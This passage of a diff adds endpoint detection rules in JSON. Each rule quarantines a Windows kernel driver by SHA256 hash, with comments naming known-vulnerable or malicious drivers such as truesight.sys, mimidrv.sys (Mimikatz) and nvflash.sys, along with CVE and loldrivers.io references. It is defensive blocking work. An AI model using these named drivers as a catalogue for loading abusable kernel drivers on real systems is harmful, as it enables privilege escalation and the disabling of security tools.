+ "creation_date": "2026-03-23T11:45:31.826280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8dffa660be7c9d6ccc87311ed2038e7f65ff271234aee91b4e6eb320ce0ccd8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "609227ab-c0e2-5ed4-a90c-71b7d22990a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970810Z",
+ "creation_date": "2026-03-23T11:45:29.970814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff93411c576df8e6bd0819a81b5c8006b3630001a0f65cd505d09ade7b151780",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6092eebf-1724-5f54-b7ef-c0e5f28e195f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619143Z",
+ "creation_date": "2026-03-23T11:45:29.619144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c58c38e4737c750ccafa621a18d875299bb5440bb1900eb8469dcf4130049c8",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60a316ca-5506-5081-8417-a195d79e801b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604807Z",
+ "creation_date": "2026-03-23T11:45:29.604809Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f97f6d53fff47914174bc3a05fb016e2c02ed0b43c827e5e5aadba2d244aecc",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60aea1fc-ec81-5f53-b4b7-4cb816e71dec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973095Z",
+ "creation_date": "2026-03-23T11:45:29.973097Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f66b821601bbbc87aaf656f85d9c91b677a3c5e5162a69322eec51504a830c7",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60b99017-fa90-5cda-aae1-2833c4b3ecff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613753Z",
+ "creation_date": "2026-03-23T11:45:29.613755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60be8512-8a90-55cb-b95f-08cdd27aafe0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984821Z",
+ "creation_date": "2026-03-23T11:45:29.984823Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc",
+ "comment": "Dangerous Physmem Kernel Driver (aka AsrSmartConnectDrv.Sys) [https://www.loldrivers.io/drivers/57f63efb-dc43-4dba-9413-173e3e4be750/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60d97f0f-bb3a-5766-afb9-efce6a2f4811",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467792Z",
+ "creation_date": "2026-03-23T11:45:30.467796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467804Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11dc70eb8864bc00b4b8e7c62a52c4602864e2ec717cc0606e1252b119c91085",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60e325ae-75a1-5ed2-b845-27eaa34b1b88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145588Z",
+ "creation_date": "2026-03-23T11:45:31.145590Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e02a1a5c7b7fdb1a04392426a740e42f3318f5e1f597e727c6d15910fbe8e7c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60e77ad7-2b81-5685-918d-3d6452a23841",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145948Z",
+ "creation_date": "2026-03-23T11:45:32.145957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145962Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bf84b41789b3d5d5622732b5c4f5630da189ede2098b0ce166fcae331178377",
+ "comment": "Vulnerable Kernel Driver (aka TSDRVX64.sys) [https://www.loldrivers.io/drivers/424a387e-735e-49d1-99de-f067dcf1c3e9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60ebd6f3-d4c9-52d6-9586-2076d93c6b28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480884Z",
+ "creation_date": "2026-03-23T11:45:30.480887Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa0c52cebd64a0115c0e7faf4316a52208f738f66a54b4871bd4162eb83dc41a",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60f3c1cf-fe17-55c2-a2d6-ce82ec10d5a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146619Z",
+ "creation_date": "2026-03-23T11:45:32.146621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15e84d040c2756b2d1b6c3f99d5a1079dc8854844d3c24d740fafd8c668e5fb9",
+ "comment": "Resigned Vulnerable TfSysMon driver used by ValleyRAT (aka amdi2c.sys and tProtect.dll) [https://x.com/anylink20240604/status/1905691075639222521] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60f66a26-a6b7-53ac-84b3-7c00e8c29494",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153453Z",
+ "creation_date": "2026-03-23T11:45:31.153455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8823296ad5d22748afcf520b42bb36a499a59075f9ab20ad284a6d298d324d7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60fed010-f31c-528f-aa4c-d797608507b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486581Z",
+ "creation_date": "2026-03-23T11:45:31.486585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d3d845765157e937b7b28aed462df187a3cec9596addc5df54614fbd7eeb5d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61153147-5671-535c-95bc-14ad0cc4e590",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481647Z",
+ "creation_date": "2026-03-23T11:45:31.481651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481660Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41c99deafb4d6abfd88eeba042974668ca9b353e815facf1323b4a8f82d22b14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6150d20e-20b2-5dcb-842c-32efab2f5620",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823737Z",
+ "creation_date": "2026-03-23T11:45:30.823739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a7c832f7e92bb42275284956430c67002b58af8483d8e338af8bed6b3bef369",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6155cc1b-0efb-5388-936d-075f8b4b0ef0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144428Z",
+ "creation_date": "2026-03-23T11:45:32.144430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd41e9a82e7be92a5d77624054a0b9e5e725492bae527f31e878140482ce802f",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "616a840f-9cb9-5dca-bfd6-01ad502158a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454419Z",
+ "creation_date": "2026-03-23T11:45:30.454422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454431Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "616eb9fe-7ec6-5c14-bd03-c6014ff587a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454996Z",
+ "creation_date": "2026-03-23T11:45:30.454999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfe2dd2cf1eb8b79d3b4ae980cda6fd933979d47c837fda77256a24a41316468",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6174d307-b55e-513d-b308-817a1657f131",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144221Z",
+ "creation_date": "2026-03-23T11:45:32.144223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7af2ff5d405cf9cd1aee2410a969ba22d6df78d98e9d4e60cbe624d8a3bc64a6",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "618785c6-cf85-585e-8b54-1d5ab7096efa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970650Z",
+ "creation_date": "2026-03-23T11:45:29.970654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970661Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "866c7615e52e73cb2f462e7db41570e513b1fb577088ef14f9eff0c5559b15ac",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "618e9a30-ee48-575a-929d-ecabf2bf099c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153367Z",
+ "creation_date": "2026-03-23T11:45:31.153371Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d455f42dd0e8b01958840ab3d534bee8a1c3532540b1b6b3024d1435d174717",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "61b411e1-cd92-532e-81dc-33a78c2a8a07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474423Z",
+ "creation_date": "2026-03-23T11:45:31.474427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474434Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79294a62e1e87b177738b310bb4c90de6b60c02f2097562807a7f9f7bba8237d",
